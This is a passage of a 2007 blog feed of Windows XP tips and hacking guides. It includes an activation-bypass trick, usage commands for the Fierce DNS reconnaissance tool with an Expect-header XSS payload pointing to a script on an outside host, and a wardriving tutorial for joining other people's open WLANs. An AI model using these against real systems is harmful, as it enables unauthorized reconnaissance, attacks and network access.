Express\5.0. Left-click on 5.0, then right-click on a blank space in the pane on the right side. Choose 'New' DWORD and name it NSplash with a value of 1.&lt;br /&gt;&lt;br /&gt;Unload DLLs&lt;br /&gt;To prevent Windows from caching DLLs after the program using them has closed, follow this procedure: Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ then left-click on Explorer. 
Right-click (as above) and create the DWORD AlwaysUnloadDLL with a value of 1. This requires a reboot to take effect. This will allow memory to be used more efficiently.&lt;br /&gt;&lt;br /&gt;Hack IE Title Bar&lt;br /&gt;This can be an impressive bit of personalization. Use your name or moniker to brand Internet Explorer. Go to &lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ and left-click on Main to change the string "Window Title" to whatever you wish.&lt;br /&gt;&lt;br /&gt;Encode MP3s with WiMP&lt;br /&gt;Install an MP3 codec (compression/decompression, required for this operation). You can download it here. Once installed, navigate to the following string in regedit: &lt;br /&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\MediaPlayer\Settings\ then to MP3Encoding and set the following:&lt;br /&gt;"LowRate"=dword:0000dac0 &lt;br /&gt;"MediumRate"=dword:0001f400 &lt;br /&gt;"MediumHighRate"=dword:0003e800 &lt;br /&gt;"HighRate"=dword:0004e200&lt;br /&gt;After reboot, you'll be in the MP3 business without third-party software.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-4008615852970466902?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/4008615852970466902/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=4008615852970466902' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4008615852970466902'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4008615852970466902'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/xp-registry-hacks.html' title='Xp registry 
hacks'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3381296840972795475</id><published>2007-12-14T07:13:00.001-08:00</published><updated>2007-12-14T07:13:59.672-08:00</updated><title type='text'>Xp tricks part 2</title><content type='html'>One-Button Adjustment&lt;br /&gt;To change the built-in functions for either speed or visual effects, right-click on the 'My Computer' icon, then 'Properties' and the 'Advanced' tab. Hit the 'Settings' button and choose either 'Adjust for best appearance' or 'Adjust for best performance' to flip the switch on all of the graphical enhancements.&lt;br /&gt;&lt;br /&gt;Folder Icons&lt;br /&gt;For all folders except Thumbnails, pictures may be added or different icons may be chosen, either from those in SHELL32.dll (default) or from any icon collection on your hard drive. Just right-click on the folder, choose 'Properties' then the 'Customize' tab &amp; browse away.&lt;br /&gt;&lt;br /&gt;Clear Type Innovation&lt;br /&gt;This little goody, originally developed for laptops, will enhance your experience, both on and off the Internet. Hey, don't take my word for it: go here, say 'Yes' to the little program install, then tune and tweak to your heart's content. You will enjoy the results.&lt;br /&gt;&lt;br /&gt;Change is Good and So Easy&lt;br /&gt;The quickest way to change your user name and the picture that appears next to it on the Start Menu is to double-click on that picture. From the menu that appears, you can change lotsa stuff. Pick a new picture. The pictures are 48 X 48 by default, but Windows XP will resize whatever you choose. The closer to the default size (and square), the better your results will be. Scan your face. 
Have fun with it. You can also prevent the irritating highlighting of newly-installed programs. Leave the option 'Set up my account to use .NET Passport' alone 'cause it's a security nightmare.&lt;br /&gt;&lt;br /&gt;Your Desktop - Your Choices&lt;br /&gt;Right-click on the Desktop, select 'Properties' then the 'Desktop' tab. &lt;br /&gt;Hit the 'Customize Desktop' button and select which icons you want to appear.&lt;br /&gt;&lt;br /&gt;In order to allow items (like custom shortcuts) to be added to the Taskbar, just right-click on it, choose 'Toolbars' then 'Quick Launch.' Delete any icons you don't want, then drag shortcuts from the desktop to this new area.&lt;br /&gt;&lt;br /&gt;Folder Options&lt;br /&gt;Each folder can use its own display properties, set from the 'View' drop-down menu. Thumbnails makes sense for folders that contain images, of course. To speed the loading of this option, go to the Control Panel and click 'Folder Options.' Under the 'View' tab, be certain that 'Do not cache thumbnails' is not checked.&lt;br /&gt;&lt;br /&gt;The Ultimate Appearance Tweak&lt;br /&gt;Microsoft Sez: "You can connect up to 10 monitors to your Windows XP-based computer and display numerous programs or windows at one time. You can use your mouse to move items from one monitor to &lt;br /&gt;another. You can open a different file on each monitor. Or several. Or you can stretch one item across several monitors; so for example, you can see more columns in a Microsoft Excel spreadsheet, or the entire layout of a Web page, without scrolling." Consider it. Monitors and PCI video cards are pretty cheap now. 
Windows recognizes the addition &amp; allows easy adjustments on the 'Display Properties/Settings' menu.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-3381296840972795475?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3381296840972795475/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3381296840972795475' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3381296840972795475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3381296840972795475'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/xp-tricks-part-2.html' title='Xp tricks part 2'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-1837772220139552651</id><published>2007-12-14T07:09:00.000-08:00</published><updated>2007-12-14T07:12:52.268-08:00</updated><title type='text'>Xp tricks part 1</title><content type='html'>Activate Once Forever&lt;br /&gt;Windows will require re-activation if several pieces of hardware are changed at one time. It makes sense to try to spread these installations out to avoid the hassle.&lt;br /&gt;&lt;br /&gt;But what if the WinXP OS must be re-installed on the same system? To avoid having to re-activate, keep a copy of wpa.dbl from the System32 folder with your backups. 
Make sure to create a fresh copy with any hardware upgrade. Upon re-installing WinXP, just copy wpa.dbl back to the System32 folder to skip activation.&lt;br /&gt;&lt;br /&gt;Deactivate WinXP 'Spyware'&lt;br /&gt;Although mentioned on the Windows Tweaks page, it's worth repeating here if you missed it. Win XP users have a new set of security issues, including a plethora of default settings that cause 'phone home' activity, automatic updates and  downloads without user choice or intervention. The method for manually disabling these is here. Free software to change these settings easily is here.&lt;br /&gt;&lt;br /&gt;WinXP Power Toys&lt;br /&gt;This versatile (unsupported) collection of goodies from Microsoft includes:&lt;br /&gt;&lt;br /&gt;Tweak UI: Provides access to system settings that are not exposed in the Windows XP default user interface, including mouse settings, Explorer settings, taskbar settings, and more.&lt;br /&gt;&lt;br /&gt;Super-Fast User Switcher: Switch between users without having to go through the Logon screen (see Quick Tips, below, for another way).&lt;br /&gt;&lt;br /&gt;Open Command Window Here: Adds an "Open Command Window Here" context menu option on file system folders.&lt;br /&gt;&lt;br /&gt;Taskbar Magnifier: Magnify part of the screen from the taskbar.&lt;br /&gt;&lt;br /&gt;Power Calculator: Graph and evaluate functions as well as perform many different types of conversions.&lt;br /&gt;&lt;br /&gt;Image Resizer: Resize one or many image files with a right-click.&lt;br /&gt;&lt;br /&gt;CD Slide Show Generator: View images burned to a CD as a slide show. &lt;br /&gt;&lt;br /&gt;Virtual Desktop Manager: Manage up to four desktops from the Windows taskbar. 
Multiple monitors are much better.&lt;br /&gt;&lt;br /&gt;Webcam Timershot: Lets you take pictures at specified time intervals from a Webcam connected to your computer and save them to a location that you designate.&lt;br /&gt;&lt;br /&gt;HTML Slide Show Wizard: Helps you create an HTML slide show of your digital pictures, ready to place on your Web site.&lt;br /&gt;&lt;br /&gt;Microsoft pulled Power Toys for WinXP to de-bug them, and re-released them on April 23, 2002. This time, these proggies are available separately, which is a good thing. Click here to see 'em. &lt;br /&gt;&lt;br /&gt;Don't forget IE Powertoys, a cool collection of enhancements designed for IE5.x but which work beautifully with IE6.x. Find it on the Internet page. Useful, fun and the price is right.&lt;br /&gt;&lt;br /&gt;Hide Recycle Bin&lt;br /&gt;Yes, there's a registry or 'inf' file hack for this, but why? Download TweakUI, above, change the Recycle Bin to a folder (so you can move it off the Desktop, like into My Documents), eliminate the icon and revel in your pristine desktop, without an icon to be seen (if you choose). Hey, your wallpaper looks great!&lt;br /&gt;&lt;br /&gt;Remove 'Shortcut to' prefix and arrow&lt;br /&gt;See TweakUI, above. Don't hack the registry unnecessarily.&lt;br /&gt;&lt;br /&gt;Dig into the system&lt;br /&gt;While there is a command that can be entered at a command-line prompt (ipconfig) which will display or allow configuration of IP information, a sweeter solution is the GUI goodness of the familiar winipcfg from Win 9.X/Me. Download it from Microsoft here, install it, then just hit Start/Run, type winipcfg and hit 'Enter.' You're so clever.&lt;br /&gt;&lt;br /&gt;To access information on your entire system, including hardware, installed software application info and more, hit Start/Run and type winmsd. 
To access more information as well as change default startup items (harmlessly), try Start/Run msconfig.&lt;br /&gt;&lt;br /&gt;Task Manager in WinXP is a versatile tool which displays running applications and processes (a la Ctrl/Alt/Del in Win 9.x/Me) as well as a graphical display of Performance items like CPU, Page File Usage and Networking information. Right-click on the Taskbar and select 'Task Manager' (keyboard shortcut Ctrl/Shift/Esc). Try it &amp; see.&lt;br /&gt;&lt;br /&gt;To configure virtually any aspect of WinXP hardware, software and behavior, hit Start/Run, type gpedit.msc and hit 'Enter' to access the Group Policy Editor. This is where you can turn off 'Autoplay' for CD-ROMs if you wish. Have fun in there.&lt;br /&gt;&lt;br /&gt;Those Nasty Balloon Tips&lt;br /&gt;These things are like the neighbor's wind chimes; an annoyance foisted upon us against our will that only gets more irritating with time. The quick, easy method of disposal is with the Group Policy Editor, above. No third-party software or registry hacking is necessary. Choose 'Disable Balloon Tips' and breathe a sigh of relief. Too bad there's no 'Delete' button for annoying neighbors.&lt;br /&gt;&lt;br /&gt;WinXP Quick Tips&lt;br /&gt;There are several methods (some involve risky and unnecessary registry hacks) for removing the persistent and annoying MSN Messenger. Hit 'Start/Run' then copy and paste the following: 'RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove' (without the quotes). Hit enter and it's gone. &lt;br /&gt;&lt;br /&gt;To enable sending items wherever you wish on your computer easily, enable hidden and system folders in the 'View' folder settings, open &lt;br /&gt;C:\Documents and Settings\your_user_name\SendTo\ and add shortcuts to whatever locations you wish.&lt;br /&gt;&lt;br /&gt;Instantly switch between users by depressing the Win key and 'Q' simultaneously. After a moment, all users appear. 
Keep hitting 'Q' to rotate between them.&lt;br /&gt;&lt;br /&gt;You will use far less memory if you keep multiple applications minimized rather than in open windows.&lt;br /&gt;&lt;br /&gt;To create a keyboard shortcut from a desktop shortcut, right-click on the shortcut, choose properties and enter the combination in the Shortcut Key box, including two of the following: CTRL, ALT, and/or SHIFT. OK out and it's done.&lt;br /&gt;&lt;br /&gt;To eliminate the annoying question "Are you sure?" when you delete an item, right-click on the Recycle Bin icon, choose 'Properties' and remove the (default) checkmark from 'Display delete confirmation dialog.'&lt;br /&gt;&lt;br /&gt;Prefetch works great to speed up operations in WinXP, but the default folder needs a cleanout every few weeks or the clutter will actually slow the system. Open the 'Prefetch' folder in C:\WINDOWS, left-click 'Edit,' choose 'Select All,' right click on any item in the folder and choose 'Delete' to dump everything.&lt;br /&gt;&lt;br /&gt;Unless you spend most computer time doing searches, this tweak will add a little speed to your system. Open My Computer, right-click on C:\ and select 'Properties.' Uncheck 'Allow indexing service to index this disk for faster searches' and OK out. Select 'Apply to all folders and subfolders' in the pop-up window.&lt;br /&gt;&lt;br /&gt;To prevent the operating system from asking for the WinXP disk during installations, copy the I386 folder from the XP CD and paste it into the C:\ drive. That'll stop it.&lt;br /&gt;&lt;br /&gt;What? You actually used the Briefcase in Win9.x/Me? 
OK, to get it back on the desktop in XP, go to C:\WINDOWS\system32\dllcache and double click on 'syncapp' to place it on your desktop.&lt;br /&gt;&lt;br /&gt;If you've removed the Recycle Bin from the Desktop (see Registry Hacks, below), you can access it either from a 'Desktop' Toolbar (added by right-clicking on the Taskbar, choosing 'Toolbars' and putting a checkmark by that setting) or by opening 'My Documents' &amp; going up one level.&lt;br /&gt;&lt;br /&gt;If you don't want XP to display the programs in the Start Menu that it determines are used most frequently, right-click in the empty space on the left side of the menu, choose 'Properties' then 'Start Menu' and Customize. Click on 'Clear List' and set the number to zero.&lt;br /&gt;&lt;br /&gt;Right-click My Computer, and then click 'Properties' then 'Advanced.' From here you can choose for what functions the greater portion of processing and power is used and set virtual memory if you're so inclined.&lt;br /&gt;&lt;br /&gt;To place the programs you want permanently on the Start Menu, right-click on the program from the pop-up menu and choose 'Pin to Start Menu.'&lt;br /&gt;&lt;br /&gt;For a quick desktop shortcut to any folder, file or application, find the target on your hard drive, right-click and choose 'Send to Desktop.'&lt;br /&gt;&lt;br /&gt;New Tips for June, 2002&lt;br /&gt;Shutting down WinXP is a three-click process, but it's easy to make it a single-click process, either from a desktop or Taskbar Icon. Right-click on the Desktop, choose 'New' then 'Shortcut.' A window will pop up with a dialog box for the shortcut path. Type this exactly: C:\windows\system32\shutdown.exe -s -t 00 keeping in mind that the last character is a zero, not a capital O (to make a similar shortcut for restart, substitute -r for -s). Choose 'Next' and type in a name for your new shortcut. Right-click on your new shortcut, choose 'Properties' then 'Change Icon' to make it attractive. 
Leave it on your desktop or drag it to your taskbar.&lt;br /&gt;&lt;br /&gt;If you haven't already found it, making the text background that appears beneath desktop icons transparent is a snap. Go to the Control Panel, choose 'System' then 'Advanced'. Click on the 'Performance' tab then 'Settings' and put a check in the 'Use Drop Shadows' box. Voila!&lt;br /&gt;&lt;br /&gt;To keep those ugly lines from forming beneath the text on your desktop icons, go to the Control Panel and choose 'Folder Options' to be certain that 'Underline icon titles consistent with my browser' is checked. Open 'Internet Options' then the 'Advanced' tab. Under 'Browsing' look for 'Underline Links' and choose 'Never.' Now, doesn't that look better?&lt;br /&gt;&lt;br /&gt;Now that the 'official' release of WinXP has passed the six-month mark, some of you may be experiencing some performance degradation, the source of which can't be traced. Before resorting to the sure-fire re-format and re-install, try this simple procedure. Create a new user name (with Administrator rights). See if this 'New User' experiences better performance. If so, switch to your original user name, transfer settings and accounts to the 'New User' and enjoy the improved performance. Once you're satisfied that all settings and accounts have transferred properly, eliminate your old user name and run RegCleaner to eliminate outdated settings.&lt;br /&gt;&lt;br /&gt;Boot Disk Returns&lt;br /&gt;Unlike Win2000 or WinMe, WinXP can and will produce a boot disk. Stuff a floppy into the drive, open 'My Computer' then '3 1/2" Floppy Drive,' right click and choose 'Format'. From the drop-down menu, choose 'Create Startup Disk.'&lt;br /&gt;&lt;br /&gt;Microsoft Sez:&lt;br /&gt;"Customer research shows a frequently requested feature that users want from their PCs is fast system startup, whether from cold boot or when resuming from standby or hibernation." 
If you're not booting in less than 30 seconds, go here &amp; get the MSoft tool that will speed up boot times with varying but (to my knowledge) never negative results.&lt;br /&gt;&lt;br /&gt;Save Streaming Media&lt;br /&gt;It's cool to listen to MP3s (or watch movies) over the Internet. Often, saving this media, however, seems impossible. Hey, if it plays on your computer, it's on your hard drive. Once the file is fully loaded and with folder view set to show hidden and system folders, search for the media (.mp3 or .mpg). There it is!&lt;br /&gt;&lt;br /&gt;IE 6 Stuff&lt;br /&gt;New security features in IE 6.x are cool, but if you'd rather not have the web pages you've viewed stored on your computer, you have to choose the option manually. From the 'Tools' menu, select 'Internet Options,' then 'Advanced.' Under 'Security,' check 'Empty Temporary Internet Files folder when browser is closed.'&lt;br /&gt;&lt;br /&gt;If you prefer Google (as most do) as the search engine of choice, put the page on your hard drive ('File/Save As' from IE 6.x), then open the saved page with the browser and from 'Tools/Internet Options/General,' choose 'Use Current' to have IE load instantly and already Googlized.</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/1837772220139552651/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=1837772220139552651' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1837772220139552651'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1837772220139552651'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/xp-tricks-part-1.html' title='Xp tricks part 1'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-7980817219644628799</id><published>2007-12-14T07:07:00.000-08:00</published><updated>2008-01-30T04:35:14.248-08:00</updated><title type='text'>Fierce domain scan</title><content type='html'>Fierce domain scan was born out of personal frustration after performing a web application security audit. It is traditionally very difficult to discover large swaths of a corporate network that is non-contiguous. It's terribly easy to run a scanner against an IP range, but if the IP ranges are nowhere near one another you can miss huge chunks of networks.&lt;br /&gt;&lt;br /&gt;First what Fierce is not. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any un-targeted attacks. It is meant specifically to locate likely targets both inside and outside a corporate network. Only those targets are listed (unless the -nopattern switch is used). No exploitation is performed (unless you do something intentionally malicious with the -connect switch). Fierce is a reconnaissance tool. Fierce is a PERL script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.&lt;br /&gt;&lt;br /&gt;First it queries your DNS for the DNS servers of the target. 
It then switches to using the target's DNS server (you can use a different one if you want using the -dnsserver switch but this can cause problems if the server you use won't tell you information about other people's sites and of course you won't find much relevant internal address space). Fierce then attempts to dump the SOA records for the domain in the very slim hope that the DNS server that your target uses may be misconfigured. Once that fails (because it almost always will) it attempts to "guess" names that are common amongst a lot of different companies. Don't ask me where I got the list, it's just a list of names that id and I have seen all over the place. I thought about adding a dictionary to this, but I think that would take a lot longer, and given that very few of the words are dictionary words I don't think this would add a lot of value.&lt;br /&gt;&lt;br /&gt;Next, if it finds anything on any IP address it will scan up and down a set amount (default 5 but you can expand it with -traverse or increase it to the entire subnet with -wide) looking for anything else with the same domain name in it using reverse lookups. If it finds anything on any of those it will recursively scan until it doesn't find any more. In this way it ends up looping a lot, and the bigger the domain is the more you get back. The reason Fierce automatically switches to using the target's DNS server is so that it can probe the Intranet (RFC1918) of the target, assuming the target uses a single DNS server for both their Intranet and external sites.&lt;br /&gt;&lt;br /&gt;I also added a random call to something that should fail to test for wildcard DNS. If it's found, the wildcard is discarded to reduce erroneous results. That doesn't speed up the scan because it still needs to check to see if the test resolves back to IP address that the wildcard is pointing to. 
However it does reduce false positives.&lt;br /&gt;&lt;br /&gt;Also, I've added a "search" option that allows you to find other non-related domain names. For example, let's say my target's domain is widget.com but I know they have email addresses like soandso@widgetcompany.com and own another company called nutsandbolts.com I can add search queries. This won't scan for those domains, but if those names pop up, it won't ignore them. Fierce will report on anything inside the search pattern as long as it matches. If you want everything I guess you could put a,b,c,...,x,y,z but I'll probably make something in the future to allow for scanning/reporting the entire C block once anything is found in it that matches the DNS string. Here's the syntax:&lt;br /&gt;&lt;br /&gt;perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts&lt;br /&gt;&lt;br /&gt;I also realized it can be a little bad about finding everything in a class C if the target used non-contiguous blocks within the class C. To deal with that I built in a function to allow a scan (of only C blocks). This is also really useful for scanning intranets if the DNS is poorly configured. I might expand on this later.&lt;br /&gt;&lt;br /&gt;perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com&lt;br /&gt;&lt;br /&gt;As an alternative, you can use the -wide switch which does a wide path of reverse lookups after finding any C names that match your query in the C block. This provides a lot more information but is a lot more noisy.&lt;br /&gt;&lt;br /&gt;perl fierce.pl -dns example.com -wide -file output.txt&lt;br /&gt;&lt;br /&gt;Finally, for the web application security folks I added a command to connect to any http servers on port 80 and perform whatever action you put into a configuration file. 
This is really noisy and really slow (especially on large networks), so I wouldn't recommend trying it unless you have a few hours with nothing better to do, unless you know there are only a handful of machines or have already run this without the connect scan turned on.&lt;br /&gt;&lt;br /&gt;perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt&lt;br /&gt;&lt;br /&gt;Here's what a sample header file might look like. The sample file below is attempting to exploit the Expect cross site scripting vulnerability:&lt;br /&gt;&lt;br /&gt;GET / HTTP/1.0&lt;br /&gt;User-Agent: Mozilla/5.0&lt;br /&gt;Host:&lt;br /&gt;Expect: This is remote text via xss.js located at ha.ckers.org&lt;br /&gt;&lt;br /&gt;Fierce also has wordlist support so that you can supply your own dictionary using the -wordlist keyword. Since the brute force does rely on matching at least a few internal targets, this could be helpful if you know that the naming convention is non-obvious or uses another language, etc.&lt;br /&gt;&lt;br /&gt;perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt&lt;br /&gt;&lt;br /&gt;Not convinced? Prior to running the scan I had never been to either mail.ru or rambler.ru (a few of the top Alexa sites in Russia). Since I don't read Russian, performing an audit against them is far more difficult. Here's some sample output from the two. In the first example you can see that mail.ru has a non-contiguous address for its mobile.mail.ru compared with the rest of the site. That would have been very difficult to locate with any other scanner. 
In the rambler.ru example you can see the RFC1918 space 10.* pop up:&lt;br /&gt;&lt;br /&gt;mail.ru - 418 entries and 303 hostnames found.&lt;br /&gt;rambler.ru - 472 entries and 458 hostnames found.&lt;br /&gt;&lt;br /&gt;Trust me, we've found far more interesting sites than these two in our tests, but I don't want to disparage any companies for their mistakes. I'm sure you can think of a few companies to test this against. The results can be pretty amazing. If you don't get many results, that could be one of three things: 1) you aren't scanning their corporate domain, you are only scanning their external domain which they only have one or two machines on, 2) it's a very small company or 3) you typo'd the domain name (I haven't built any checks to make sure the domain you entered is valid).&lt;br /&gt;&lt;br /&gt;Requirements: This is a PERL program requiring the PERL interpreter with the modules Net::DNS and Net::hostent. You can install modules using CPAN:&lt;br /&gt;&lt;br /&gt;perl -MCPAN -e 'install Net::DNS'&lt;br /&gt;perl -MCPAN -e 'install Net::hostent'&lt;br /&gt;&lt;br /&gt;Windows users: You can use Fierce under Windows if you use Cygwin with PERL and the above two modules installed. I have not tested this using ActivePerl in Windows, so I would recommend Cygwin until ActivePerl can be thoroughly tested. I am/was working on a win32 version of Fierce, but have put the project on hold. If anyone is interested in picking up where I left off, drop me a line.&lt;br /&gt;&lt;br /&gt;Version: Fierce is currently at version 0.9.9 - Beta 03/24/2007&lt;br /&gt;&lt;br /&gt;Download: fierce.pl&lt;br /&gt;&lt;br /&gt;Download: hosts.txt&lt;br /&gt;&lt;br /&gt;(Thanks to Robert E Lee for the help with this and to Michael Thumann's DNSDigger wordlist).&lt;br /&gt;&lt;br /&gt;Getting started: perl fierce.pl -help&lt;br /&gt;&lt;br /&gt;This may have some bugs in it. 
Also this can be a noisy scanner, but in the tests I've performed it's exceptionally effective at finding non-contiguous IP blocks and new attack points. This should be considered a precursor to nmap, unicornscan or nessus as it gives you enough information to begin a much more thorough scan with one of those other tools. Also, it can point out DNS entries for hosts that are no longer up or have not yet been put into production. Please use Fierce with care and at your own risk.</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/7980817219644628799/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=7980817219644628799' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7980817219644628799'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/7980817219644628799'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/fierce-domain-scan.html' title='Fierce domain scan'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-2751649791593930776</id><published>2007-12-13T06:50:00.000-08:00</published><updated>2007-12-13T07:00:14.558-08:00</updated><title type='text'>LANJacking: the New Hacker Mecca</title><content 
type='html'>Getting free Internet access through IEEE standard 802.11b wireless Ethernet LANs (often called Wi-Fi LANs or WLANs) is the newest and biggest ever hacker scene. In many areas you can get free access legally through Wi-Fi systems run by volunteers. Elsewhere, it’s the wild west all over again, with spammers, computer criminals, and mostly harmless hackers running wild on WLANs whose owners have no concept of what they are hosting.&lt;br /&gt;&lt;br /&gt;First we will cover the easy stuff: how to break into a WLAN that doesn’t authenticate users (LANJacking). These are fairly common. To do this, get a laptop with a wireless NIC (WNIC). Configure your NIC to automatically set up its IP address, gateway and DNS servers. Then, use the software that came with your NIC to automatically detect and get you online.&lt;br /&gt;&lt;br /&gt;For example, with an Orinoco NIC, in Client Manager set the SSID (service set identifier required to be able to exchange packets on that WLAN) to be "any" or "null." Then from the Advanced menu select Site Manager. That should show you all available Wi-Fi access points.&lt;br /&gt;&lt;br /&gt;Once you are set up to detect WLANs, then for happiest hunting, start driving (wardriving) or walking (stumbling) around an area with businesses or apartment buildings. Susan Updike points out, "Don’t forget airports – many VIP lounges, etc. have wireless hubs accessible from inside the airport or even in the parking lots."&lt;br /&gt;&lt;br /&gt;How do you know when you’ve gotten online? One way is to run an intrusion detection system that alerts you when you get any kind of network traffic.&lt;br /&gt;&lt;br /&gt;An easier and faster way to find those access points and choose the one you want to use is to run Network Stumbler, at http://www.netstumbler.com. It shows you all Wi-Fi access points within range of you. Network Stumbler runs on Windows desktop and laptop machines, and Mini Stumbler runs on Wi-Fi-enabled PDAs. 
Netstumbler-like software is available for MacOSX with either an internal AirPort card or any PCMCIA Wi-Fi card at http://www.mxinternet.net/~markw/.&lt;br /&gt;&lt;br /&gt;For NetBSD, OpenBSD, and FreeBSD you can get BSD-Airtools at http://www.dachb0den.com/projects/bsd-airtools.html.&lt;br /&gt;&lt;br /&gt;If you want to locate vulnerable WLANs in wholesale lots, there is an even more interesting tool. At http://www.kismetwireless.net/ you can download Kismet, a WLAN sniffer that also separates and identifies many wireless networks in the area you are testing. A version of Kismet is available for Linux. Kismet also supports FreeBSD, OpenBSD and MacOSX.&lt;br /&gt;&lt;br /&gt;Following are examples from a wardriving session by William Marchand of UnixHQ (http://www.unixhq.org) using a Windows 2000 Professional laptop and Netstumbler.&lt;br /&gt;&lt;br /&gt;Figure 1: Not connected yet.&lt;br /&gt;&lt;br /&gt;However, he fires up Netstumbler and lo and behold, he sees Fig. 2. &lt;br /&gt;&lt;a href="http://www.happyhacker.org/graphics/screen-2.jpg"&gt;&lt;img style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 1280px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://www.happyhacker.org/graphics/screen-2.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Figure 2: Bill is within range of a Wi-Fi access point on Channel 6. 
Details are in the right hand panel.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.happyhacker.org/graphics/screen-3.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 1280px;" src="http://www.happyhacker.org/graphics/screen-3.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Figure 3: It looks like a strong signal.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.happyhacker.org/graphics/screen-4.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 347px;" src="http://www.happyhacker.org/graphics/screen-4.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Figure 4: Time to get online!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.happyhacker.org/graphics/screen-5.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 617px;" src="http://www.happyhacker.org/graphics/screen-5.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Figure 5: The deed is done.&lt;br /&gt;&lt;br /&gt;A Linux version of Kismet is on the Überhacker CD-rom; Kismet also supports FreeBSD, OpenBSD and MacOSX.&lt;br /&gt;&lt;br /&gt;Kismet works with any 802.11b wireless card that is capable of reporting raw packets (rfmon support). These include any Prism2 based card (Linksys, D-Link, Rangelan, etc), Cisco Aironet cards, and Orinoco based cards. Kismet also supports the WSP100 802.11b remote sensor by Network Chemistry and is able to monitor 802.11a networks with cards using the Ar5k chipset. Here’s where it gets interesting. 
